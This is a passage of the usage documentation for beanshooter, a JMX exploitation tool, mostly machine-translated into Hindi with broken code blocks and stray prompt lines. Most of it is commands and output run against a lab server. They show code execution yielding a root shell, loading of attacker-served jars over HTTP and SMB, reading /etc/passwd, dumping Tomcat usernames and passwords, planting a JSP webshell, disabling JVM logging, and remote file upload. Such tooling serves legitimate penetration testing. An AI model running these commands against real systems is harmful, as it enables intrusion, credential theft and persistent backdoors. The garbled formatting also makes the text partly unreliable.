`standard` क्रिया के माध्यम से कमांड निष्पादन अंधा होता है और आपको अपने कमांड का आउटपुट प्राप्त नहीं होता है। इसके अलावा, डिफ़ॉल्ट रूप से आपका कमांड `Runtime.exec(String str)` को पास किया जाता है, जो विशेष शेल सुविधाओं का समर्थन नहीं करता है। यदि आप शेल सुविधाओं का उपयोग करना चाहते हैं, तो `--exec-array` विकल्प का उपयोग करें और अपना कमांड इस प्रकार निर्दिष्ट करें: `'sh -c echo "my cool command" > /tmp/test.txt'`। `--exec-array` के साथ, *beanshooter* निर्दिष्ट कमांड को तीन भागों में विभाजित करता है और उन्हें `Runtime.exec(String[] arr)` में पास करता है। हालांकि, कमांड निष्पादित करने के लिए सामान्यतः *TonkaBean* परिनियोजन का उपयोग करने की अनुशंसा की जाती है:```console
[qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 tonka
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+] 	Deplyoing MBean: StandardMBean
[+] 	MBean with object name de.qtc.beanshooter:standard=4121868972140 was successfully deployed.
[+]
[+] 	Caught NullPointerException while invoking the newTransformer action.
[+] 	This is expected bahavior and the attack most likely worked :)
[+]
[+] 	Removing MBean with ObjectName de.qtc.beanshooter:standard=4121868972140 from the MBeanServer.
[+] 	MBean was successfully removed.
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[[email protected] /]$ id
uid=0(root) gid=0(root) groups=0(root)

सामान्य tonka deploy क्रिया की तुलना में बड़ा लाभ यह है कि StandardMBean के माध्यम से तैनाती के लिए बाहरी नेटवर्क कनेक्शन की आवश्यकता नहीं होती है। यदि standard ... tonka के माध्यम से सीधी तैनाती काम नहीं करती है, तो आप TonkaBean Jar फ़ाइल अपलोड करके इसे MLet और file:// प्रोटोकॉल के माध्यम से लोड कर सकते हैं:```console [qtc@devbox ~]$ beanshooter tonka export --stager-url file:///tmp/ [+] Exporting MBean jar file: ./tonka-bean-4.0.0-jar-with-dependencies.jar [+] Exporting MLet HTML file to: ./index.html [+] Class: de.qtc.beanshooter.tonkabean.TonkaBean [+] Archive: tonka-bean-4.0.0-jar-with-dependencies.jar [+] Object: MLetTonkaBean:name=TonkaBean,id=1 [+] Codebase: file:/tmp/ [qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 upload tonka-bean-4.0.0-jar-with-dependencies.jar::/tmp/tonka-bean-4.0.0-jar-with-dependencies.jar [+] Creating a TemplateImpl payload object to abuse StandardMBean [+] [+] Deplyoing MBean: StandardMBean [+] MBean with object name de.qtc.beanshooter:standard=4825542879735 was successfully deployed. [+] [+] Caught NullPointerException while invoking the newTransformer action. [+] This is expected bahavior and the attack most likely worked :) [+] [+] Removing MBean with ObjectName de.qtc.beanshooter:standard=4825542879735 from the MBeanServer. [+] MBean was successfully removed. [qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 upload index.html::/tmp/index.html [+] Creating a TemplateImpl payload object to abuse StandardMBean [+] [+] Deplyoing MBean: StandardMBean [+] MBean with object name de.qtc.beanshooter:standard=4836961801045 was successfully deployed. [+] [+] Caught NullPointerException while invoking the newTransformer action. [+] This is expected bahavior and the attack most likely worked :) [+] [+] Removing MBean with ObjectName de.qtc.beanshooter:standard=4836961801045 from the MBeanServer. [+] MBean was successfully removed. [qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url file:///tmp/index.html [+] Starting MBean deployment. [+] [+] Deplyoing MBean: TonkaBean [+] [+] MBean class is not known by the server. [+] Starting MBean deployment. [+] [+] Deplyoing MBean: MLet [+] MBean with object name DefaultDomain:type=MLet was successfully deployed. [+] [+] Loading MBean from file:///tmp/index.html [+] [+] MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed.

root@kitploit:~
यदि आप `standard` क्रिया द्वारा कार्यान्वित तकनीक के बारे में अधिक जानना चाहते हैं, तो मैं अत्यधिक इस [ब्लॉग पोस्ट](https://codewhitesec.blogspot.com/2023/03/jmx-exploitation-revisited.html) को [CODE WHITE](https://twitter.com/codewhitesec) द्वारा सुझाता हूँ, जो इसे बहुत विस्तार से समझाता है।

#### हटाना

`undeploy` क्रिया निर्दिष्ट `ObjectName` वाले *MBean* को *JMX* सेवा से हटाती है:```console
[qtc@devbox ~]$ beanshooter undeploy 172.17.0.2 9010 qtc.test:type=Example 
[+] Removing MBean with ObjectName qtc.test:type=Example from the MBeanServer.
[+] MBean was successfully removed.

MBean संचालन


मूल संचालन के विपरीत, जो JMX एंडपॉइंट द्वारा उजागर की गई सामान्य कार्यक्षमता को लक्षित करते हैं, MBean संचालन एक विशिष्ट MBean को लक्षित करते हैं। प्रत्येक समर्थित MBean के लिए, beanshooter एक और उपपार्सर प्रदान करता है जिसमें संबंधित MBean के लिए उपलब्ध संचालन और विकल्प शामिल होते हैं। निम्नलिखित सूची mlet MBean और उससे संबद्ध उपपार्सर का एक उदाहरण दिखाती है:```console [qtc@devbox ~]$ beanshooter mlet -h usage: beanshooter mlet [-h] ...

positional arguments:

root@kitploit:~
load                 load a new MBean from the specified URL
attr                 set or get MBean attributes
deploy               deploys the specified MBean on the JMX server
info                 print server information about the MBean
invoke               invoke the specified method on the MBean
stats                print local information about the MBean
status               checks whether the MBean is registered
undeploy             undeploys the specified MBEAN from the JMX server

named arguments: -h, --help show this help message and exit

root@kitploit:~
### सामान्य MBean संचालन

---

कुछ *beanshooter* संचालन प्रत्येक *MBean* के लिए उपलब्ध हैं और इस अनुभाग में प्रदर्शित किए गए हैं।
ये सामान्य *MBean* संचालन अक्सर [मूल संचालन](#basic-operations) की कार्यक्षमता को प्रतिबिंबित करते हैं,
लेकिन *ObjectName* निर्दिष्ट करने की आवश्यकता के बिना।

#### सामान्य Attr

`attr` क्रिया मूल संचालन के `attr` क्रिया के समान काम करती है। हालांकि, *ObjectName*
को अब निर्दिष्ट करने की आवश्यकता नहीं है, क्योंकि यह निर्दिष्ट *MBean* के भीतर समाहित है।```console
[qtc@devbox ~]$ beanshooter tomcat attr 172.17.0.2 1090 users
Users:type=User,username="manager",database=UserDatabase
Users:type=User,username="admin",database=UserDatabase
Users:type=User,username="status",database=UserDatabase

जेनेरिक डिप्लॉय

The deploy action works basically like the deploy action from the basic operations. However, since the class name, ObjectName and the implementing jar file are all already associated with the specified MBean, you only need to specify the --stager-url option with this action (assuming that a builtin jar file is available):```console [qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8000 [+] Starting MBean deployment. [+] [+] Deplyoing MBean: TonkaBean [+] [+] MBean class is not known to the server. [+] Loading MBean from http://172.17.0.1:8000 [+] [+] Creating HTTP server on: 172.17.0.1:8000 [+] Creating MLetHandler for endpoint: / [+] Creating JarHandler for endpoint: /440441bf8c794d40a83caf1e34cd9993 [+] Starting HTTP server... [+] [+] Incoming request from: iinsecure.example [+] Requested resource: / [+] Sending mlet: [+] [+] Class: de.qtc.beanshooter.tonkabean.TonkaBean [+] Archive: 440441bf8c794d40a83caf1e34cd9993 [+] Object: MLetTonkaBean:name=TonkaBean,id=1 [+] Codebase: http://172.17.0.1:8000 [+] [+] Incoming request from: iinsecure.example [+] Requested resource: /440441bf8c794d40a83caf1e34cd9993 [+] Sending jar file with md5sum: 55a843002e13f763137d115ce4caf705 [+] [+] MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed

root@kitploit:~
*beanshooter v4.1.0* से, [standard](#standard) क्रिया के माध्यम से *TonkaBean* को तैनात करना भी संभव है।
`standard` क्रिया के माध्यम से बीन तैनाती के लिए लक्ष्य सर्वर से बाहरी नेटवर्क कनेक्शन की **आवश्यकता नहीं** होती है।

#### सामान्य निर्यात

कभी-कभी *beanshooters* स्टेजर सर्वर का उपयोग करके *MBean* कार्यान्वयन प्रदान करना संभव नहीं होता है। एक सामान्य परिदृश्य यह है कि आपकी स्थानीय मशीन से बाहरी कनेक्शन अवरुद्ध होते हैं। ऐसी स्थितियों में, आप *MBean* को किसी अन्य स्थान से लोड करना चाह सकते हैं, जैसे कि आंतरिक नेटवर्क में *SMB* सेवा जहाँ आपके पास लिखने की पहुँच है।

`export` क्रिया निर्दिष्ट *MBean* को लागू करने वाली *jar* फ़ाइल और *MLet* का उपयोग करके *MBean* को लोड करने के लिए आवश्यक एक संगत *MLet HTML* दस्तावेज़ निर्यात करती है। मान लें कि आप *TonkaBean* को `10.10.10.5` पर सुन रहे *SMB* सेवा से प्रस्तुत करना चाहते हैं, तो आप निम्न कमांड का उपयोग कर सकते हैं:```console
[qtc@devbox ~]$ beanshooter tonka export --export-dir export --stager-url file:////10.10.10.5/share/
[+] Exporting MBean jar file: export/tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Exporting MLet HTML file to: export/index.html
[+] 	Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+] 	Archive:   tonka-bean-3.0.0-jar-with-dependencies.jar
[+] 	Object:    MLetTonkaBean:name=TonkaBean,id=1
[+] 	Codebase:  file:////10.10.10.5/share/

बाद में, आप निर्यात किए गए jar और index.html फ़ाइल को SMB सेवा पर अपलोड कर सकते हैं और beanshooters की तैनाती क्रिया का उपयोग --stager-url file:////10.10.10.5/share/index.html विकल्प के साथ कर सकते हैं।

सामान्य जानकारी

info क्रिया निर्दिष्ट MBean की विधि और विशेषता जानकारी सूचीबद्ध करती है:```console [qtc@devbox ~]$ beanshooter tomcat info 172.17.0.2 1090 [+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean [+] ObjectName: Users:type=UserDatabase,database=UserDatabase [+] [+] Attributes: [+] modelerType (type: java.lang.String , writable: false) [+] readonly (type: boolean , writable: false) [+] roles (type: [Ljava.lang.String; , writable: false) [+] groups (type: [Ljava.lang.String; , writable: false) [+] users (type: [Ljava.lang.String; , writable: false) [+] pathname (type: java.lang.String , writable: true) [+] writable (type: null , writable: false) [+] [+] Operations: [+] java.lang.String findGroup(java.lang.String groupname) [+] java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName) [+] void removeGroup(java.lang.String groupname) [+] void removeUser(java.lang.String username) [+] void save() [+] java.lang.String findRole(java.lang.String rolename) [+] void removeRole(java.lang.String rolename) [+] java.lang.String createGroup(java.lang.String groupname, java.lang.String description) [+] java.lang.String findUser(java.lang.String username) [+] java.lang.String createRole(java.lang.String rolename, java.lang.String description)

root@kitploit:~
#### सामान्य Invoke

`invoke` क्रिया का उपयोग निर्दिष्ट *MBean* पर एक मनमाना विधि को आह्वान करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tomcat invoke 172.17.0.2 1090 --signature 'findUser(String username)' admin
Users:type=User,username="admin",database=UserDatabase

सामान्य सांख्यिकी

stats क्रिया निर्दिष्ट MBean पर कुछ सामान्य जानकारी सूचीबद्ध करती है। यह वह जानकारी है जो beanshooters स्थानीय रूप से संबंधित MBean पर संग्रहीत करता है और कोई सर्वर इंटरैक्शन आवश्यक नहीं है।```console [qtc@devbox ~]$ beanshooter tonka stats [+] MBean: tonka [+] Object Name: MLetTonkaBean:name=TonkaBean,id=1 [+] Class Name: de.qtc.beanshooter.tonkabean.TonkaBean [+] Jar File: available (tonka-bean-3.0.0-jar-with-dependencies.jar)

root@kitploit:~
The `Jar File` जानकारी यह बताती है कि संबंधित *MBean* का कार्यान्वयन *beanshooter* में बिल्ट-इन है या नहीं। यह jar फ़ाइल परिनियोजन के दौरान उपयोग की जाती है, यदि इसे `--jar-file` विकल्प का उपयोग करके ओवरराइट नहीं किया गया हो। वर्तमान में, *TonkaBean* एकमात्र *MBean* है जिसके पास *Jar File* उपलब्ध है।

#### Generic Status

`status` क्रिया जाँच करती है कि संबंधित *MBean* पहले से *JMX* सेवा पर उपलब्ध है या नहीं:```console
[qtc@devbox ~]$ beanshooter tonka status 172.17.0.2 9010
[+] MBean Status: not deployed

सामान्य अनडिप्लॉय

अनडिप्लॉय क्रिया निर्दिष्ट MBean को एक रिमोट JMX सेवा से हटाता है:```console [qtc@devbox ~]$ beanshooter tonka undeploy 172.17.0.2 9010 [+] Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer. [+] MBean was successfully removed.

root@kitploit:~
### Diagnostic

---

The *DiagnosticCommandMBean* एक उपयोगी *MBean* है जो अक्सर *JMX सर्वरों* पर डिफ़ॉल्ट रूप से तैनात किया जाता है।
यह कई अलग-अलग विधियों को लागू करता है जो आक्रामक दृष्टिकोण से दिलचस्प हैं। उनमें से कुछ
*beanshooter* संचालन के रूप में लागू किए गए हैं। अन्य को निश्चित रूप से मैन्युअल रूप से आमंत्रित किया जा सकता है।

#### Diagnostic Read

`read` ऑपरेशन का उपयोग *MBean* सर्वर पर टेक्स्ट फ़ाइलों को पढ़ने के लिए किया जा सकता है। यह ऑपरेशन
निर्दिष्ट टेक्स्ट फ़ाइल की सामग्री वाले अपवाद को उत्पन्न करने के लिए `addCompilerDirective` विधि का उपयोग करता है:```console
[qtc@devbox ~]$ beanshooter diagnostic read 172.17.0.2 1090 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

यह तकनीक मूल रूप से @TheLaluka द्वारा jolokia-exploitation-toolkit के अंतर्गत लागू की गई थी।

नैदानिक लोड

load ऑपरेशन का उपयोग JMX सर्वर के फ़ाइल सिस्टम से एक साझा लाइब्रेरी लोड करने के लिए किया जा सकता है:```console [qtc@devbox ~]$ beanshooter diagnostic load 172.17.0.2 1090 /lib/x86_64-linux-gnu/libc.so.6 [+] The server complained about the missing function Agent_OnAttach [+] The specified library was loaded succesfully.

root@kitploit:~
#### नैदानिक लॉगफ़ाइल

`logfile` क्रिया का उपयोग *JVM* के लॉगफ़ाइल स्थान को बदलने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter diagnostic logfile 172.17.0.2 1090 /tmp/test.log
[+] Logfile path was successfully set to /tmp/test.log

निदानात्मक Nolog

nolog कार्रवाई का उपयोग लॉगिंग को अक्षम करने के लिए किया जा सकता है (लॉगफ़ाइल हैंडल को बंद करने के लिए उपयोगी):```console [qtc@devbox ~]$ beanshooter diagnostic nolog 172.17.0.2 1090 [+] Logging was disabled successfully.

root@kitploit:~
#### निदानात्मक cmdline

`cmdline` कार्रवाई उस cmdline को प्रिंट करती है जिसके साथ *JVM* लॉन्च किया गया था:```console
[qtc@devbox ~]$ beanshooter diagnostic cmdline 172.17.0.2 1090
VM Arguments:
jvm_args: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp -Djava.rmi.server.hostname=iinsecure.example -Djavax.net.ssl.keyStorePassword=password -Djavax.net.ssl.keyStore=/opt/store.p12 -Djavax.net.ssl.keyStoreType=pkcs12 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.port=1090 -Dcom.sun.management.jmxremote.rmi.port=1099
java_command: org.apache.catalina.startup.Bootstrap start
java_class_path (initial): /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Launcher Type: SUN_STANDARD

निदानात्मक प्रॉपर्टीज़

props क्रिया सिस्टम प्रॉपर्टीज़ की सूची प्रिंट करती है:```console [qtc@devbox ~]$ beanshooter diagnostic props 172.17.0.2 1090 #Mon Jul 25 19:17:52 UTC 2022 com.sun.management.jmxremote.rmi.port=1099 awt.toolkit=sun.awt.X11.XToolkit java.specification.version=11 sun.cpu.isalist= ...

root@kitploit:~
### HotSpot

---

The *HotSpotDiagnosticMXBean* एप्लिकेशन सर्वर पर *HotSpot वर्चुअल मशीन* के प्रबंधन के लिए एक इंटरफ़ेस प्रदान करता है
और कुछ ऐसे तरीकों का समर्थन करता है जो आक्रामक दृष्टिकोण से उपयोगी हैं।

#### HotSpot dump

`dump` क्रिया एक heapdump बनाती है और इसे एप्लिकेशन सर्वर पर किसी भी स्थान पर सहेजती है।
एकमात्र आवश्यकता यह है कि डंप को `.hprof` एक्सटेंशन वाली फ़ाइल के रूप में सहेजा जाए:```console
[qtc@devbox ~]$ beanshooter hotspot dump 172.17.0.2 1090 /tmp/dump.hprof
[+] Heapdump file /tmp/dump.hprof was created successfully.

HotSpot list

list क्रिया उपलब्ध Diagnostic Options और उनसे जुड़े मानों की एक सूची प्रदर्शित करती है:```console [qtc@devbox ~]$ beanshooter hotspot list 172.17.0.2 1090 [+] HeapDumpBeforeFullGC (value = false, writable = true) [+] HeapDumpAfterFullGC (value = false, writable = true) [+] HeapDumpOnOutOfMemoryError (value = false, writable = true) [+] HeapDumpPath (value = , writable = true) ...

root@kitploit:~
#### HotSpot get

`get` क्रिया निर्दिष्ट विकल्प का मान प्राप्त करने की अनुमति देती है:```console
[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: false
[+] Writable: true

HotSpot set

set क्रिया निर्दिष्ट विकल्प का मान सेट करने की अनुमति देती है:```console [qtc@devbox ~]$ beanshooter hotspot set 172.17.0.2 1090 HeapDumpBeforeFullGC true [+] Option was set successfully. [qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC [+] Name: HeapDumpBeforeFullGC [+] Value: true [+] Writable: true

root@kitploit:~
### MLet

---

*MLetMBean* एक प्रसिद्ध *MBean* है जिसका उपयोग नेटवर्क पर अतिरिक्त *MBeans* लोड करने के लिए किया जा सकता है। इसका उपयोग पहले से ही *beanshooters* के `deploy` क्रिया द्वारा परोक्ष रूप से किया जाता है, लेकिन इसे `mlet` संक्रिया का उपयोग करके मैन्युअल रूप से भी लागू किया जा सकता है।

#### MLet Load

वर्तमान में केवल लागू *MLet* विधि `load` संक्रिया है जिसका उपयोग उपयोगकर्ता द्वारा निर्दिष्ट *URL* से *MBean* वर्ग लोड करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 tonka http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] 	Deplyoing MBean: MLet
[+] 	MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] 	Creating HTTP server on: 172.17.0.1:8000
[+] 		Creating MLetHandler for endpoint: /
[+] 		Creating JarHandler for endpoint: /3584de270132420aaf0812366bc46035
[+] 		Starting HTTP server... 
[+] 		
[+] 	Incoming request from: iinsecure.example
[+] 	Requested resource: /
[+] 	Sending mlet:
[+]
[+] 		Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+] 		Archive:   3584de270132420aaf0812366bc46035
[+] 		Object:    MLetTonkaBean:name=TonkaBean,id=1
[+] 		Codebase:  http://172.17.0.1:8000
[+]
[+] 	Incoming request from: iinsecure.example
[+] 	Requested resource: /3584de270132420aaf0812366bc46035
[+] 	Sending jar file with md5sum: b2f7040f7d8f2d1f40b205d631ff7356
[+]
[+] MBean was loaded successfully.

उपरोक्त उदाहरण दिखाता है कि TonkaBean को mlet ऑपरेशन का उपयोग करके मैन्युअल रूप से कैसे लोड किया जा सकता है। यदि आप इसके बजाय एक कस्टम MBean लोड करना चाहते हैं, तो आपको tonka के बजाय कीवर्ड custom निर्दिष्ट करना होगा और --class-name, --object-name और --jar-file विकल्प प्रदान करने होंगे:```console [qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 custom http://172.17.0.1:8000 --class-name de.qtc.beanshooter.ExampleBean --object-name ExampleBean:name=ExampleBean,id=1 --jar-file www/example.jar [+] Starting MBean deployment. [+] ... [+] MBean was loaded successfully.

root@kitploit:~
### Recoder

---

FlightRecorderMXBean, *Flight Recorder* के प्रबंधन के लिए एक इंटरफ़ेस प्रदान करता है और आक्रामक दृष्टिकोण से कुछ दिलचस्प विधियों का समर्थन करता है।

#### Recoder new

`new` ऑपरेशन एक नई रिकॉर्डिंग शुरू करता है। लौटाई गई रिकॉर्डिंग आईडी का उपयोग अन्य ऑपरेशनों के लिए लक्ष्य के रूप में किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter recorder new 172.17.0.2 1090
[+] Requesting new recording on the MBeanServer.
[+] New recording created successfully with ID: 1

Recoder start

start क्रिया एक मौजूदा रिकॉर्डिंग को प्रारंभ करती है और अतिरिक्त तर्क के रूप में रिकॉर्डिंग आईडी की अपेक्षा करती है:```console [qtc@devbox ~]$ beanshooter recorder start 172.17.0.2 1090 1 [+] Recording with ID 1 started successfully.

root@kitploit:~
#### Recoder dump

जब एक रिकॉर्डिंग सक्रिय होती है, तो इसकी सामग्री को `dump` क्रिया का उपयोग करके डंप किया जा सकता है। यह रिकॉर्डिंग जानकारी को *JMX सर्वर* पर एक डंप फ़ाइल में संग्रहीत करता है:```console
[qtc@devbox ~]$ beanshooter recorder dump 172.17.0.2 1090 1 /tmp/dump.dat
[+] Recording with ID 1 was successfully dumped to /tmp/dump.dat

रिकॉर्डर रोकें

stop क्रिया का उपयोग रिकॉर्डिंग को रोकने के लिए किया जा सकता है:```console [qtc@devbox ~]$ beanshooter recorder stop 172.17.0.2 1090 1 [+] Recording with ID 1 stopped successfully.

root@kitploit:~
#### Recorder save

एक रिकॉर्डिंग रोक दिए जाने के बाद, इसे `save` क्रिया का उपयोग करके सहेजा जा सकता है। `dump` क्रिया के विपरीत, यह रिकॉर्डिंग को एप्लिकेशन सर्वर के बजाय स्थानीय मशीन पर सहेजता है।```console
[qtc@devbox ~]$ beanshooter recorder save 172.17.0.2 1090 1 recording.dat
[+] Saving recording with ID: 1
[+] Writing recording data to: /home/qtc/recording.dat

टॉमकैट


tomcat ऑपरेशन Apache Tomcat के MemoryUserDatabaseMBean के साथ इंटरैक्ट करता है। यह MBean एक Tomcat सेवा पर उपलब्ध उपयोगकर्ता खातों तक पहुंच प्रदान करता है।

Tomcat डंप

dump क्रिया Tomcat सर्वर पर उपलब्ध उपयोगकर्ता नाम और पासवर्ड को स्थानीय फ़ाइलों में डंप करती है। जब एकल तर्क के साथ आह्वान किया जाता है, तो क्रेडेंशियल्स <username>:<password> प्रारूप में डंप किए जाते हैं:```console [qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 creds.txt [+] Dumping credentials... [+] Users dumped to /home/qtc/creds.txt [qtc@devbox ~]$ cat creds.txt manager:P@55w0rD# admin:s3cr3T!$ status:[email protected]

root@kitploit:~
जब दो तर्कों के साथ पुकारा जाता है, उपयोगकर्ता नाम पहले निर्दिष्ट स्थान में संग्रहीत होते हैं, पासवर्ड दूसरे में:```console
[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 users.txt passwords.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/users.txt
[+] Passwords dumped to /home/qtc/passwords.txt

Tomcat List

list ऑपरेशन उपलब्ध उपयोगकर्ता खातों, उनसे संबंधित भूमिकाओं और प्रमाण-पत्रों को सूचीबद्ध करता है:```console [qtc@devbox ~]$ beanshooter tomcat list 172.17.0.2 1090 [+] Listing tomcat users: [+] [+] ---------------------------------------- [+] Username: manager [+] Password: P@55w0rD# [+] Roles: [+] Users:type=Role,rolename="manager-gui",database=UserDatabase [+] Users:type=Role,rolename="manager-script",database=UserDatabase [+] Users:type=Role,rolename="manager-jmx",database=UserDatabase [+] Users:type=Role,rolename="manager-status",database=UserDatabase [+] [+] ---------------------------------------- [+] Username: admin [+] Password: s3cr3T!$ [+] Roles: [+] Users:type=Role,rolename="admin-gui",database=UserDatabase [+] Users:type=Role,rolename="admin-script",database=UserDatabase [+] [+] ---------------------------------------- [+] Username: status [+] Password: [email protected] [+] Roles: [+] Users:type=Role,rolename="manager-status",database=UserDatabase

root@kitploit:~
#### Tomcat Write

The `write` ऑपरेशन एक आंशिक रूप से नियंत्रित फ़ाइल को एप्लिकेशन सर्वर पर किसी मनमानी स्थान पर लिखता है। इस क्रिया का उपयोग *Tomcat* सेवा पर एक webshell को विश्वसनीय रूप से तैनात करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tomcat write 172.17.0.2 1090 /opt/webshell-cli/webshells/webshell.jsp /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Writing local file /opt/webshell-cli/webshells/webshell.jsp to server location /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] 	Current user database is at conf/tomcat-users.xml
[+] 	Current user database is readonly
[+] 	Adjusting readonly property to make it writable.
[+] 	Changing database path to /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] 	Creating new role containing the local file content.
[+] 	Saving modified user database.
[+] 	Restoring readonly property.
[+] 	Restoring pathname property.
[+] All done.
[qtc@devbox ~]$ webshell-cli http://172.17.0.2:8080/shell.jsp
[root@d475fdb21692 /usr/local/tomcat]$ id
uid=0(root) gid=0(root) groups=0(root)

The write action abuses an encoding bug within the UserDatabase MBean of Apache Tomcat. We reported the bug, but it was not considered a security vulnerability. For writing to arbitrary locations, beanshooter needs to change the location of the UserDatabase. All changes are restored, after the desired file was written, but still be careful in production environments.

Tonka


The TonkaBean is a custom MBean that is implemented by the beanshooter project and allows file system access and command execution on the JMX server. Its actions can be accessed by using the tonka operation, followed by the desired action.

Tonka Exec

The exec action can be used to invoke a single command on the JMX service:```console [qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 id [+] Invoking the executeCommand method with argument: id [+] The call was successful [+] [+] Server response: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
exec ऑपरेशन का अंतिम तर्क एक स्ट्रिंग होने की अपेक्षा की जाती है। जब `--shell` विकल्प का उपयोग नहीं किया जाता है, तो इस स्ट्रिंग को स्पेस पर विभाजित किया जाता है (कोट्स को ध्यान में रखते हुए) और इसे सर्वर साइड पर `ProcessBuilder` क्लास में एक ऐरे के रूप में पास किया जाता है।

यदि `--shell` का उपयोग किया गया था, तो निर्दिष्ट शेल स्ट्रिंग को स्पेस पर विभाजित किया जाता है और परिणामी ऐरे को निर्दिष्ट तर्क स्ट्रिंग के साथ जोड़ा जाता है, इससे पहले कि इसे `ProcessBuilder` क्लास में पास किया जाए। इससे शेल जैसी निष्पादन की अनुमति मिलती है, जिसमें शेल विशेष वर्णों की सही व्याख्या होती है:```console
[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 --shell 'ash -c' 'echo $HOSTNAME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOSTNAME
[+] The call was successful
[+]
[+] Server response:
fee2d783023b

सुविधा के लिए, सामान्य शेल स्वचालित रूप से आवश्यक कमांड स्ट्रिंग आर्गुमेंट के साथ प्रत्ययित होते हैं। इसलिए, --shell ash स्वचालित रूप से --shell 'ash -c' में परिवर्तित हो जाता है।

Tonka Execarray

execarray ऑपरेशन exec क्रिया के समान है, लेकिन एक स्ट्रिंग को आर्गुमेंट के रूप में अपेक्षित करने और इस स्ट्रिंग को कमांड ऐरे बनाने के लिए स्पेस पर विभाजित करने के बजाय, execarray ऑपरेशन कई आर्गुमेंट्स को निर्दिष्ट करने की अनुमति देता है जो सीधे ProcessBuilder क्लास के लिए कमांड ऐरे के रूप में उपयोग किए जाते हैं:```console [qtc@devbox ~]$ beanshooter tonka execarray 172.17.0.2 9010 -- ash -c 'echo $HOME' [+] Invoking the executeCommand method with argument: ash -c echo $HOME [+] The call was successful [+] [+] Server response: /root

root@kitploit:~
#### Tonka Shell

`shell` क्रिया एक कमांड शेल उत्पन्न करती है जहाँ आप उन कमांड्स को निर्दिष्ट कर सकते हैं जो *JMX* सर्वर पर निष्पादित की जाती हैं। यह शेल पूरी तरह से इंटरैक्टिव नहीं है और केवल *जावा* के `Runtime.exec` मेथड के चारों ओर एक रैपर का प्रतिनिधित्व करता है। हालाँकि, पर्यावरण चर और एक वर्तमान कार्यशील निर्देशिका के लिए बुनियादी समर्थन लागू किया गया है:```console
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[[email protected] /]$ id
uid=0(root) gid=0(root) groups=0(root)
[[email protected] /]$ cd /home
[[email protected] /home]$ !env test=example
[[email protected] /home]$ echo $test
example

उपरोक्त उदाहरण दर्शाता है कि !env कीवर्ड का उपयोग करके पर्यावरण चर कैसे सेट किए जाते हैं। इस कीवर्ड के अलावा, कई अन्य उपलब्ध हैं:```console [qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010 [[email protected] /]$ !help Available shell commands: execute the specified command cd

change working directory on the server exit|quit exit the shell !help|!h print this help menu !environ|!env = set new environment variables in key=value format !upload|!put upload a file to the remote MBeanServer !download|!get download a file from the remote MBeanServer !background|!back executes the specified command in the background

root@kitploit:~
#### Tonka Upload

`upload` क्रिया का उपयोग *JMX* सर्वर पर फ़ाइल अपलोड करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tonka upload 172.17.0.2 9010 file.dat /tmp
[+] Uploading local file /home/qtc/file.dat to path /tmp on the MBeanSerer.
[+] 33 bytes were written to /tmp/file.dat

